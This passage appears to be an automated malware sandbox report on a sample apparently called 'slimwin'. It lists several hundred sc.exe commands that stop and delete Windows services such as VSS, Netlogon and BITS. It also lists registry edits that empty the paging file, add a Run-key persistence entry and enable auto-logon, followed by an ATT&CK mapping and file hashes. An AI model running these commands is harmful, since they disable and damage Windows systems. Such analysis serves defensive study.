- C:\Windows\system32\sc.exe
  sc delete Atdisk
  2⤵
  - Launches sc.exe
  PID:4136
- C:\Windows\system32\sc.exe
  sc stop Atmarpc
  2⤵
  PID:3040
- C:\Windows\system32\sc.exe
  sc delete Atmarpc
  2⤵
  PID:4968
- C:\Windows\system32\sc.exe
  sc stop BITS
  2⤵
  PID:1180
- C:\Windows\system32\sc.exe
  sc delete BITS
  2⤵
  PID:564
- C:\Windows\system32\sc.exe
  sc stop cbidf2k
  2⤵
  PID:2636
- C:\Windows\system32\sc.exe
  sc delete cbidf2k
  2⤵
  PID:1340
- C:\Windows\system32\sc.exe
  sc stop cd20xrnt
  2⤵
  - Launches sc.exe
  PID:3760
- C:\Windows\system32\sc.exe
  sc delete cd20xrnt
  2⤵
  PID:4600
- C:\Windows\system32\sc.exe
  sc stop Cdaudio
  2⤵
  PID:1356
- C:\Windows\system32\sc.exe
  sc delete Cdaudio
  2⤵
  PID:264
- C:\Windows\system32\sc.exe
  sc stop Changer
  2⤵
  PID:1072
- C:\Windows\system32\sc.exe
  sc delete Changer
  2⤵
  PID:1448
- C:\Windows\system32\sc.exe
  sc stop cisvc
  2⤵
  PID:3328
- C:\Windows\system32\sc.exe
  sc delete cisvc
  2⤵
  PID:1304
- C:\Windows\system32\sc.exe
  sc stop ClipSrv
  2⤵
  PID:3400
- C:\Windows\system32\sc.exe
  sc delete ClipSrv
  2⤵
  PID:2580
- C:\Windows\system32\sc.exe
  sc stop CmdIde
  2⤵
  PID:2728
- C:\Windows\system32\sc.exe
  sc delete CmdIde
  2⤵
  PID:848
- C:\Windows\system32\sc.exe
  sc stop COMSysApp
  2⤵
  PID:336
- C:\Windows\system32\sc.exe
  sc delete COMSysApp
  2⤵
  PID:4052
- C:\Windows\system32\sc.exe
  sc stop Cpqarray
  2⤵
  PID:5108
- C:\Windows\system32\sc.exe
  sc delete Cpqarray
  2⤵
  PID:2872
- C:\Windows\system32\sc.exe
  sc stop dac960nt
  2⤵
  PID:1156
- C:\Windows\system32\sc.exe
  sc delete dac960nt
  2⤵
  PID:864
- C:\Windows\system32\sc.exe
  sc stop dmadmin
  2⤵
  PID:1760
- C:\Windows\system32\sc.exe
  sc delete dmadmin
  2⤵
  - Launches sc.exe
  PID:232
- C:\Windows\system32\sc.exe
  sc stop dpti2o
  2⤵
  PID:1532
- C:\Windows\system32\sc.exe
  sc delete dpti2o
  2⤵
  PID:2204
- C:\Windows\system32\sc.exe
  sc stop HidServ
  2⤵
  - Launches sc.exe
  PID:3508
- C:\Windows\system32\sc.exe
  sc delete HidServ
  2⤵
  PID:1472
- C:\Windows\system32\sc.exe
  sc stop hpn
  2⤵
  PID:2932
- C:\Windows\system32\sc.exe
  sc delete hpn
  2⤵
  - Launches sc.exe
  PID:3048
- C:\Windows\system32\sc.exe
  sc stop hpt3xx
  2⤵
  PID:2952
- C:\Windows\system32\sc.exe
  sc delete hpt3xx
  2⤵
  PID:2552
- C:\Windows\system32\sc.exe
  sc stop i2omgmt
  2⤵
  PID:2700
- C:\Windows\system32\sc.exe
  sc delete i2omgmt
  2⤵
  PID:2488
- C:\Windows\system32\sc.exe
  sc stop i2omp
  2⤵
  PID:5000
- C:\Windows\system32\sc.exe
  sc delete i2omp
  2⤵
  PID:892
- C:\Windows\system32\sc.exe
  sc stop ImapiService
  2⤵
  PID:4584
- C:\Windows\system32\sc.exe
  sc delete ImapiService
  2⤵
  PID:828
- C:\Windows\system32\sc.exe
  sc stop ini910u
  2⤵
  PID:4172
- C:\Windows\system32\sc.exe
  sc delete ini910u
  2⤵
  PID:1616
- C:\Windows\system32\sc.exe
  sc stop IpFilterDriver
  2⤵
  PID:4840
- C:\Windows\system32\sc.exe
  sc delete IpFilterDriver
  2⤵
  PID:3588
- C:\Windows\system32\sc.exe
  sc stop IpInIp
  2⤵
  PID:4148
- C:\Windows\system32\sc.exe
  sc delete IpInIp
  2⤵
  PID:1100
- C:\Windows\system32\sc.exe
  sc stop IpNat
  2⤵
  PID:4884
- C:\Windows\system32\sc.exe
  sc delete IpNat
  2⤵
  PID:4220
- C:\Windows\system32\sc.exe
  sc stop IRENUM
  2⤵
  PID:2540
- C:\Windows\system32\sc.exe
  sc delete IRENUM
  2⤵
  PID:1524
- C:\Windows\system32\sc.exe
  sc stop lbrtfdc
  2⤵
  PID:1016
- C:\Windows\system32\sc.exe
  sc delete lbrtfdc
  2⤵
  PID:4576
- C:\Windows\system32\sc.exe
  sc stop mnmsrvc
  2⤵
  PID:1736
- C:\Windows\system32\sc.exe
  sc delete mnmsrvc
  2⤵
  PID:3528
- C:\Windows\system32\sc.exe
  sc stop Modem
  2⤵
  PID:3592
- C:\Windows\system32\sc.exe
  sc delete Modem
  2⤵
  PID:4624
- C:\Windows\system32\sc.exe
  sc stop mraid35x
  2⤵
  PID:4700
- C:\Windows\system32\sc.exe
  sc delete mraid35x
  2⤵
  PID:2780
- C:\Windows\system32\sc.exe
  sc stop MSDTC
  2⤵
  PID:2532
- C:\Windows\system32\sc.exe
  sc delete MSDTC
  2⤵
  PID:2180
- C:\Windows\system32\sc.exe
  sc stop MSIServer
  2⤵
  PID:652
- C:\Windows\system32\sc.exe
  sc delete MSIServer
  2⤵
  PID:824
- C:\Windows\system32\sc.exe
  sc stop NetDDE
  2⤵
  PID:396
- C:\Windows\system32\sc.exe
  sc delete NetDDE
  2⤵
  - Launches sc.exe
  PID:3924
- C:\Windows\system32\sc.exe
  sc stop NetDDEdsdm
  2⤵
  PID:5032
- C:\Windows\system32\sc.exe
  sc delete NetDDEdsdm
  2⤵
  PID:1668
- C:\Windows\system32\sc.exe
  sc stop Netlogon
  2⤵
  PID:2988
- C:\Windows\system32\sc.exe
  sc delete Netlogon
  2⤵
  PID:4960
- C:\Windows\system32\sc.exe
  sc stop NtLmSsp
  2⤵
  PID:1568
- C:\Windows\system32\sc.exe
  sc delete NtLmSsp
  2⤵
  - Launches sc.exe
  PID:4456
- C:\Windows\system32\sc.exe
  sc stop NtmsSvc
  2⤵
  PID:2808
- C:\Windows\system32\sc.exe
  sc delete NtmsSvc
  2⤵
  - Launches sc.exe
  PID:2012
- C:\Windows\system32\sc.exe
  sc stop NwlnkFlt
  2⤵
  PID:3260
- C:\Windows\system32\sc.exe
  sc delete NwlnkFlt
  2⤵
  PID:1980
- C:\Windows\system32\sc.exe
  sc stop NwlnkFwd
  2⤵
  PID:4488
- C:\Windows\system32\sc.exe
  sc delete NwlnkFwd
  2⤵
  PID:1716
- C:\Windows\system32\sc.exe
  sc stop PCIDump
  2⤵
  PID:3208
- C:\Windows\system32\sc.exe
  sc delete PCIDump
  2⤵
  PID:2564
- C:\Windows\system32\sc.exe
  sc stop PCIIde
  2⤵
  PID:4272
- C:\Windows\system32\sc.exe
  sc delete PCIIde
  2⤵
  PID:4852
- C:\Windows\system32\sc.exe
  sc stop Pcmcia
  2⤵
  PID:1840
- C:\Windows\system32\sc.exe
  sc delete Pcmcia
  2⤵
  - Launches sc.exe
  PID:5072
- C:\Windows\system32\sc.exe
  sc stop PDCOMP
  2⤵
  PID:2052
- C:\Windows\system32\sc.exe
  sc delete PDCOMP
  2⤵
  - Launches sc.exe
  PID:4868
- C:\Windows\system32\sc.exe
  sc stop PDFRAME
  2⤵
  - Launches sc.exe
  PID:4268
- C:\Windows\system32\sc.exe
  sc delete PDFRAME
  2⤵
  PID:3716
- C:\Windows\system32\sc.exe
  sc stop PDRELI
  2⤵
  - Launches sc.exe
  PID:1072
- C:\Windows\system32\sc.exe
  sc delete PDRELI
  2⤵
  PID:1444
- C:\Windows\system32\sc.exe
  sc stop PDRFRAME
  2⤵
  PID:3192
- C:\Windows\system32\sc.exe
  sc delete PDRFRAME
  2⤵
  PID:2588
- C:\Windows\system32\sc.exe
  sc stop perc2
  2⤵
  PID:2404
- C:\Windows\system32\sc.exe
  sc delete perc2
  2⤵
  PID:2580
- C:\Windows\system32\sc.exe
  sc stop perc2hib
  2⤵
  PID:2716
- C:\Windows\system32\sc.exe
  sc delete perc2hib
  2⤵
  PID:2852
- C:\Windows\system32\sc.exe
  sc stop ql1080
  2⤵
  PID:5104
- C:\Windows\system32\sc.exe
  sc delete ql1080
  2⤵
  PID:2616
- C:\Windows\system32\sc.exe
  sc stop Ql10wnt
  2⤵
  PID:5108
- C:\Windows\system32\sc.exe
  sc delete Ql10wnt
  2⤵
  - Launches sc.exe
  PID:2872
- C:\Windows\system32\sc.exe
  sc stop ql12160
  2⤵
  PID:1156
- C:\Windows\system32\sc.exe
  sc delete ql12160
  2⤵
  PID:864
- C:\Windows\system32\sc.exe
  sc stop ql1240
  2⤵
  - Launches sc.exe
  PID:3816
- C:\Windows\system32\sc.exe
  sc delete ql1240
  2⤵
  - Launches sc.exe
  PID:1756
- C:\Windows\system32\sc.exe
  sc stop ql1280
  2⤵
  PID:4368
- C:\Windows\system32\sc.exe
  sc delete ql1280
  2⤵
  - Launches sc.exe
  PID:3648
- C:\Windows\system32\sc.exe
  sc stop RDPWD
  2⤵
  PID:1104
- C:\Windows\system32\sc.exe
  sc delete RDPWD
  2⤵
  PID:3104
- C:\Windows\system32\sc.exe
  sc stop RDSessMgr
  2⤵
  PID:3052
- C:\Windows\system32\sc.exe
  sc delete RDSessMgr
  2⤵
  - Launches sc.exe
  PID:3028
- C:\Windows\system32\sc.exe
  sc stop RemoteAccess
  2⤵
  PID:2928
- C:\Windows\system32\sc.exe
  sc delete RemoteAccess
  2⤵
  PID:2076
- C:\Windows\system32\sc.exe
  sc stop RpcLocator
  2⤵
  PID:2056
- C:\Windows\system32\sc.exe
  sc delete RpcLocator
  2⤵
  PID:5056
- C:\Windows\system32\sc.exe
  sc stop RSVP
  2⤵
  PID:2652
- C:\Windows\system32\sc.exe
  sc delete RSVP
  2⤵
  PID:892
- C:\Windows\system32\sc.exe
  sc stop SCardDrv
  2⤵
  PID:4584
- C:\Windows\system32\sc.exe
  sc delete SCardDrv
  2⤵
  PID:932
- C:\Windows\system32\sc.exe
  sc stop SCardSvr
  2⤵
  PID:4172
- C:\Windows\system32\sc.exe
  sc delete SCardSvr
  2⤵
  - Launches sc.exe
  PID:1616
- C:\Windows\system32\sc.exe
  sc stop Secdrv
  2⤵
  PID:4840
- C:\Windows\system32\sc.exe
  sc delete Secdrv
  2⤵
  PID:3000
- C:\Windows\system32\sc.exe
  sc stop Sfloppy
  2⤵
  PID:1908
- C:\Windows\system32\sc.exe
  sc delete Sfloppy
  2⤵
  PID:3412
- C:\Windows\system32\sc.exe
  sc stop SharedAccess
  2⤵
  PID:5092
- C:\Windows\system32\sc.exe
  sc delete SharedAccess
  2⤵
  PID:1520
- C:\Windows\system32\sc.exe
  sc stop Simbad
  2⤵
  PID:544
- C:\Windows\system32\sc.exe
  sc delete Simbad
  2⤵
  PID:1016
- C:\Windows\system32\sc.exe
  sc stop Sparrow
  2⤵
  PID:4576
- C:\Windows\system32\sc.exe
  sc delete Sparrow
  2⤵
  - Launches sc.exe
  PID:3908
- C:\Windows\system32\sc.exe
  sc stop stisvc
  2⤵
  PID:4564
- C:\Windows\system32\sc.exe
  sc delete stisvc
  2⤵
  PID:4184
- C:\Windows\system32\sc.exe
  sc stop SwPrv
  2⤵
  - Launches sc.exe
  PID:2280
- C:\Windows\system32\sc.exe
  sc delete SwPrv
  2⤵
  - Launches sc.exe
  PID:3964
- C:\Windows\system32\sc.exe
  sc stop symc810
  2⤵
  PID:496
- C:\Windows\system32\sc.exe
  sc delete symc810
  2⤵
  PID:2180
- C:\Windows\system32\sc.exe
  sc stop symc8xx
  2⤵
  PID:5116
- C:\Windows\system32\sc.exe
  sc delete symc8xx
  2⤵
  PID:824
- C:\Windows\system32\sc.exe
  sc stop sym_hi
  2⤵
  PID:4260
- C:\Windows\system32\sc.exe
  sc delete sym_hi
  2⤵
  PID:2424
- C:\Windows\system32\sc.exe
  sc stop sym_u3
  2⤵
  PID:1508
- C:\Windows\system32\sc.exe
  sc delete sym_u3
  2⤵
  PID:1692
- C:\Windows\system32\sc.exe
  sc stop SysmonLog
  2⤵
  PID:5028
- C:\Windows\system32\sc.exe
  sc delete SysmonLog
  2⤵
  - Launches sc.exe
  PID:2384
- C:\Windows\system32\sc.exe
  sc stop TDPIPE
  2⤵
  - Launches sc.exe
  PID:4456
- C:\Windows\system32\sc.exe
  sc delete TDPIPE
  2⤵
  PID:2808
- C:\Windows\system32\sc.exe
  sc stop TDTCP
  2⤵
  PID:1468
- C:\Windows\system32\sc.exe
  sc delete TDTCP
  2⤵
  PID:1548
- C:\Windows\system32\sc.exe
  sc stop TlntSvr
  2⤵
  PID:1844
- C:\Windows\system32\sc.exe
  sc delete TlntSvr
  2⤵
  PID:3524
- C:\Windows\system32\sc.exe
  sc stop TosIde
  2⤵
  PID:3300
- C:\Windows\system32\sc.exe
  sc delete TosIde
  2⤵
  PID:1700
- C:\Windows\system32\sc.exe
  sc stop Udfs
  2⤵
  PID:2804
- C:\Windows\system32\sc.exe
  sc delete Udfs
  2⤵
  PID:3316
- C:\Windows\system32\sc.exe
  sc stop ultra
  2⤵
  PID:1952
- C:\Windows\system32\sc.exe
  sc delete ultra
  2⤵
  PID:4568
- C:\Windows\system32\sc.exe
  sc stop upnphost
  2⤵
  - Launches sc.exe
  PID:1992
- C:\Windows\system32\sc.exe
  sc delete upnphost
  2⤵
  PID:2340
- C:\Windows\system32\sc.exe
  sc stop UPS
  2⤵
  PID:4616
- C:\Windows\system32\sc.exe
  sc delete UPS
  2⤵
  PID:4536
- C:\Windows\system32\sc.exe
  sc stop ViaIde
  2⤵
  PID:4268
- C:\Windows\system32\sc.exe
  sc delete ViaIde
  2⤵
  PID:3716
- C:\Windows\system32\sc.exe
  sc stop VSS
  2⤵
  PID:1552
- C:\Windows\system32\sc.exe
  sc delete VSS
  2⤵
  PID:1956
- C:\Windows\system32\sc.exe
  sc stop WDICA
  2⤵
  - Launches sc.exe
  PID:4060
- C:\Windows\system32\sc.exe
  sc delete WDICA
  2⤵
  PID:3400
- C:\Windows\system32\sc.exe
  sc stop Wmi
  2⤵
  - Launches sc.exe
  PID:2520
- C:\Windows\system32\sc.exe
  sc delete Wmi
  2⤵
  - Launches sc.exe
  PID:848
- C:\Windows\system32\sc.exe
  sc stop WmiApSrv
  2⤵
  - Launches sc.exe
  PID:792
- C:\Windows\system32\sc.exe
  sc delete WmiApSrv
  2⤵
  PID:1892
- C:\Windows\system32\sc.exe
  sc stop afd
  2⤵
  - Launches sc.exe
  PID:5100
- C:\Windows\system32\sc.exe
  sc delete afd
  2⤵
  PID:4644
- C:\Windows\system32\sc.exe
  sc stop agp440
  2⤵
  PID:4552
- C:\Windows\system32\sc.exe
  sc delete agp440
  2⤵
  PID:3776
- C:\Windows\system32\sc.exe
  sc stop audiosrv
  2⤵
  PID:864
- C:\Windows\system32\sc.exe
  sc delete audiosrv
  2⤵
  PID:1756
- C:\Windows\system32\sc.exe
  sc stop audstub
  2⤵
  PID:2204
- C:\Windows\system32\sc.exe
  sc delete audstub
  2⤵
  - Launches sc.exe
  PID:4032
- C:\Windows\system32\sc.exe
  sc stop cdfs
  2⤵
  PID:2944
- C:\Windows\system32\sc.exe
  sc delete cdfs
  2⤵
  PID:2932
- C:\Windows\system32\sc.exe
  sc stop cdrom
  2⤵
  PID:2676
- C:\Windows\system32\sc.exe
  sc delete cdrom
  2⤵
  - Launches sc.exe
  PID:2952
- C:\Windows\system32\sc.exe
  sc stop cmbatt
  2⤵
  PID:2076
- C:\Windows\system32\sc.exe
  sc delete cmbatt
  2⤵
  PID:2056
- C:\Windows\system32\sc.exe
  sc stop compbatt
  2⤵
  - Launches sc.exe
  PID:5056
- C:\Windows\system32\sc.exe
  sc delete compbatt
  2⤵
  PID:2652
- C:\Windows\system32\sc.exe
  sc stop dmio
  2⤵
  - Launches sc.exe
  PID:4680
- C:\Windows\system32\sc.exe
  sc delete dmio
  2⤵
  PID:316
- C:\Windows\system32\sc.exe
  sc stop dmload
  2⤵
  PID:4004
- C:\Windows\system32\sc.exe
  sc delete dmload
  2⤵
  PID:2224
- C:\Windows\system32\sc.exe
  sc stop ersvc
  2⤵
  PID:2308
- C:\Windows\system32\sc.exe
  sc delete ersvc
  2⤵
  PID:3588
- C:\Windows\system32\sc.exe
  sc stop eventsystem
  2⤵
  PID:3156
- C:\Windows\system32\sc.exe
  sc delete eventsystem
  2⤵
  PID:2536
- C:\Windows\system32\sc.exe
  sc stop fdc
  2⤵
  PID:3412
- C:\Windows\system32\sc.exe
  sc delete fdc
  2⤵
  PID:5092
- C:\Windows\system32\sc.exe
  sc stop flpydisk
  2⤵
  PID:1520
- C:\Windows\system32\sc.exe
  sc delete flpydisk
  2⤵
  PID:544
- C:\Windows\system32\sc.exe
  sc stop gpc
  2⤵
  PID:3424
- C:\Windows\system32\sc.exe
  sc delete gpc
  2⤵
  PID:1736
- C:\Windows\system32\sc.exe
  sc stop ipsec
  2⤵
  PID:3528
- C:\Windows\system32\sc.exe
  sc delete ipsec
  2⤵
  PID:3592
- C:\Windows\system32\sc.exe
  sc stop lanmanworkstation
  2⤵
  PID:2724
- C:\Windows\system32\sc.exe
  sc delete lanmanworkstation
  2⤵
  PID:2780
- C:\Windows\system32\sc.exe
  sc stop mnmdd
  2⤵
  PID:496
- C:\Windows\system32\sc.exe
  sc delete mnmdd
  2⤵
  PID:2180
- C:\Windows\system32\sc.exe
  sc stop mrxdav
  2⤵
  PID:768
- C:\Windows\system32\sc.exe
  sc delete mrxdav
  2⤵
  PID:396
- C:\Windows\system32\sc.exe
  sc stop mrxsmb
  2⤵
  PID:4260
- C:\Windows\system32\sc.exe
  sc delete mrxsmb
  2⤵
  - Launches sc.exe
  PID:2424
- C:\Windows\system32\sc.exe
  sc stop mup
  2⤵
  PID:4300
- C:\Windows\system32\sc.exe
  sc delete mup
  2⤵
  PID:3992
- C:\Windows\system32\sc.exe
  sc stop ndistapi
  2⤵
  PID:4124
- C:\Windows\system32\sc.exe
  sc delete ndistapi
  2⤵
  PID:4456
- C:\Windows\system32\sc.exe
  sc stop ndiswan
  2⤵
  PID:1020
- C:\Windows\system32\sc.exe
  sc delete ndiswan
  2⤵
  PID:1320
- C:\Windows\system32\sc.exe
  sc stop netbios
  2⤵
  PID:4304
- C:\Windows\system32\sc.exe
  sc delete netbios
  2⤵
  PID:1768
- C:\Windows\system32\sc.exe
  sc stop netbt
  2⤵
  PID:1716
- C:\Windows\system32\sc.exe
  sc delete netbt
  2⤵
  - Launches sc.exe
  PID:3208
- C:\Windows\system32\sc.exe
  sc stop parport
  2⤵
  PID:1632
- C:\Windows\system32\sc.exe
  sc delete parport
  2⤵
  - Launches sc.exe
  PID:2804
- C:\Windows\system32\sc.exe
  sc stop pcnet
  2⤵
  PID:2812
- C:\Windows\system32\sc.exe
  sc delete pcnet
  2⤵
  PID:2636
- C:\Windows\system32\sc.exe
  sc stop plugplay
  2⤵
  PID:4568
- C:\Windows\system32\sc.exe
  sc delete plugplay
  2⤵
  PID:1992
- C:\Windows\system32\sc.exe
  sc stop policyagent
  2⤵
  PID:1200
- C:\Windows\system32\sc.exe
  sc delete policyagent
  2⤵
  PID:3584
- C:\Windows\system32\sc.exe
  sc stop pptpminiport
  2⤵
  PID:4616
- C:\Windows\system32\sc.exe
  sc delete pptpminiport
  2⤵
  PID:4536
- C:\Windows\system32\sc.exe
  sc stop processor
  2⤵
  - Launches sc.exe
  PID:4268
- C:\Windows\system32\sc.exe
  sc delete processor
  2⤵
  PID:3716
- C:\Windows\system32\sc.exe
  sc stop psched
  2⤵
  PID:1552
- C:\Windows\system32\sc.exe
  sc delete psched
  2⤵
  - Launches sc.exe
  PID:1256
- C:\Windows\system32\sc.exe
  sc stop ptilink
  2⤵
  PID:4856
- C:\Windows\system32\sc.exe
  sc delete ptilink
  2⤵
  PID:2732
- C:\Windows\system32\sc.exe
  sc stop rasl2tp
  2⤵
  PID:2728
- C:\Windows\system32\sc.exe
  sc delete rasl2tp
  2⤵
  PID:3368
- C:\Windows\system32\sc.exe
  sc stop raspppoe
  2⤵
  PID:5104
- C:\Windows\system32\sc.exe
  sc delete raspppoe
  2⤵
  PID:4572
- C:\Windows\system32\sc.exe
  sc stop raspti
  2⤵
  PID:2468
- C:\Windows\system32\sc.exe
  sc delete raspti
  2⤵
  PID:1812
- C:\Windows\system32\sc.exe
  sc stop rdbss
  2⤵
  PID:3620
- C:\Windows\system32\sc.exe
  sc delete rdbss
  2⤵
  PID:2452
- C:\Windows\system32\sc.exe
  sc stop rdpcdd
  2⤵
  PID:1780
- C:\Windows\system32\sc.exe
  sc delete rdpcdd
  2⤵
  PID:4972
- C:\Windows\system32\sc.exe
  sc stop rdpdr
  2⤵
  PID:4896
- C:\Windows\system32\sc.exe
  sc delete rdpdr
  2⤵
  PID:3420
- C:\Windows\system32\sc.exe
  sc stop redbook
  2⤵
  PID:1804
- C:\Windows\system32\sc.exe
  sc delete redbook
  2⤵
  - Launches sc.exe
  PID:2936
- C:\Windows\system32\sc.exe
  sc stop serenum
  2⤵
  PID:3048
- C:\Windows\system32\sc.exe
  sc delete serenum
  2⤵
  PID:1664
- C:\Windows\system32\sc.exe
  sc stop serial
  2⤵
  PID:1220
- C:\Windows\system32\sc.exe
  sc delete serial
  2⤵
  - Launches sc.exe
  PID:2900
- C:\Windows\system32\sc.exe
  sc stop termdd
  2⤵
  PID:4776
- C:\Windows\system32\sc.exe
  sc delete termdd
  2⤵
  PID:4992
- C:\Windows\system32\sc.exe
  sc stop termservice
  2⤵
  PID:1028
- C:\Windows\system32\sc.exe
  sc delete termservice
  2⤵
  PID:5052
- C:\Windows\system32\sc.exe
  sc stop update
  2⤵
  - Launches sc.exe
  PID:5036
- C:\Windows\system32\sc.exe
  sc delete update
  2⤵
  - Launches sc.exe
  PID:4172
- C:\Windows\system32\reg.exe
  reg delete HKCC /f
  2⤵
  PID:5080
- C:\Windows\system32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Nls\CodePage" /f
  2⤵
  PID:2224
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Nls\CodePage" /v OEMHAL /t REG_SZ /d vgaoem.fon /f
  2⤵
  PID:1196
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Nls\CodePage" /v OEMCP /t REG_SZ /d 1252 /f
  2⤵
  PID:4716
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Nls\CodePage" /v ACP /t REG_SZ /d 1252 /f
  2⤵
  PID:2744
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Nls\CodePage" /v 1252 /t REG_SZ /d c_1252.nls /f
  2⤵
  PID:980
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v PagingFiles /t REG_MULTI_SZ /d "" /f
  2⤵
  PID:1432
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages" /t REG_MULTI_SZ /d "msv1_0" /f
  2⤵
  PID:1560
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v slimwin /t REG_SZ /d C:\slimwin\2.bat
  2⤵
  - Adds Run key to start application
  PID:4884
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" /v LogonType /t REG_DWORD /d 0 /f
  2⤵
  PID:1408
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" /v AutoAdminLogon /t REG_SZ /d 1 /f
  2⤵
  PID:2688
- C:\Windows\system32\attrib.exe
  attrib -r -a -s -h /S /D *
  2⤵
  - Drops file in Drivers directory
  - Drops startup file
  - Drops desktop.ini file(s)
  - Drops autorun.inf file
  - Drops file in System32 directory
  - Modifies termsrv.dll
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Views/modifies file attributes
  PID:1348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c dir /b /ad /s
  2⤵
  PID:1016

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Microsoft Office\root\Office16\VISSHE.DLL

Filesize
279KB

MD5
7efcf0111eb7a22aec8410d6a427b328

SHA1
d6828e7c4fb2789da55899e69c6197eaf4017b88

SHA256
7a83319f41c626818556e406b5b664aa4c102cb851269e9becbe3041bde4368a

SHA512
c1526e7bfe3c9f5d9ea9ab0f18d555e01f107ec56123ab83b8677ac24da57e206fb02a0148d2ae08ceba6ec4c10f42a46b0093e2324c0d723f09ec1fd4f43d97

Download Submit
C:\Program Files\Microsoft Office\root\Office16\msvcp140.dll

Filesize
613KB

MD5
c1b066f9e3e2f3a6785161a8c7e0346a

SHA1
8b3b943e79c40bc81fdac1e038a276d034bbe812

SHA256
99e3e25cda404283fbd96b25b7683a8d213e7954674adefa2279123a8d0701fd

SHA512
36f9e6c86afbd80375295238b67e4f472eb86fcb84a590d8dba928d4e7a502d4f903971827fdc331353e5b3d06616664450759432fdc8d304a56e7dacb84b728

Download Submit
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msoshext.dll

Filesize
1.7MB

MD5
c606bd7c9c733dd27f74157c34e51742

SHA1
aab92689723449fbc3e123fb614dd536a74b74d4

SHA256
606390649012b31b5d83630f1186562e4b1ce4023d8870d8c29eb62e7e0769e0

SHA512
5f8fabe3d9753413d1aedcc76b9568c50dd25a5a6aeacd1ce88aecc28c0ba96dac80177679d380708213a0997946e49383bdaca7114c8c9526a24ed999194e38

Download Submit
C:\Windows\System32\tmp.bin

Filesize
61KB

MD5
19979e1729cfa0e56eb4cccb198dfd05

SHA1
a8c4d015032c054ca6ac99ed23457af2316ff37f

SHA256
7f2a683f28877562409d810946ddca2f069715cdfb249602251dfa50065fff7a

SHA512
fd47db4247a08f520d6c613d1615b8deb88a0a09fb1cb14b3abdf78f4c78694f6bedf814c8c31d45a2192af579022c1277bc77729db751bc0826bb3fbe83e595

Download Submit
C:\trash\slimwin.log

Filesize
33KB

MD5
619b3c57e91942203108a8d19b3b0836

SHA1
8de66f921ce4bfaea0b53e8143068593dd59f9f1

SHA256
73487b6d536542b1b4d6a0d8c1a4b62f6e5d2e214edf57676c2d42ab75df08e6

SHA512
1f78ec22fcf6b097b169d44841bc22d595f19ac096260cf4b332738ef2875925f12495ecd3d169ee2c1499679ca9ea955d1d4be7d7f42240f4d64f4f01cbea08

Download Submit
C:\trash\slimwin.log

Filesize
4KB

MD5
c8d4d7e31b377b155b7382d632a8f1ee

SHA1
4cfbbd932654d225a82ad927d08ab61f3fa473e9

SHA256
f1f1863d79e77adefb54ce9a30c69b660f292cc3c6a1595e85973be0143dfd64

SHA512
5f93723964b981d40ed2d9c8a4c113e2136c639af2da9dac424900de02e0d6b6a16a57e1c329b7fe2eb75d860d5505cbeca13f558bc8117b461afa014c18b605

Download Submit
C:\trash\winlogon.exe.txt

Filesize
65B

MD5
cbf3f46ccd68054dff5352fde3d77101

SHA1
9019b88d758e5fae3d2a2c78886bb05cd34858b9

SHA256
27e5995912fcc1bebe9322fe95209f18d63b78a3df951b49b236b8e4b714691e

SHA512
66b8f0b4643dc987b3b425b4f8902eea8cc17f78053861aa9856f17468a1e3fc0df479bea6850904df2292c4e4c88f269c0f18a48f6c2ce74ccdaef0b0dfe93c

Download Submit
C:\trash\winsrv.dll.txt

Filesize
37B

MD5
59ab8be2ffd8e0e376a2a86f5090501c

SHA1
f2e17fe4165cae3318881aee66ee36b622fc56fd

SHA256
0695e317eb0b79743b6813ebd9e621704946b4582bf7cfa9a66ede5c83a1d93b

SHA512
d6494b745b1dc938a16b5b99917902cb41da106d3dc95e744e0476b64d9c9e2a66f843e3bf57749db39b99bc98652854a53abebb4667e60788466828c9de3c58

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads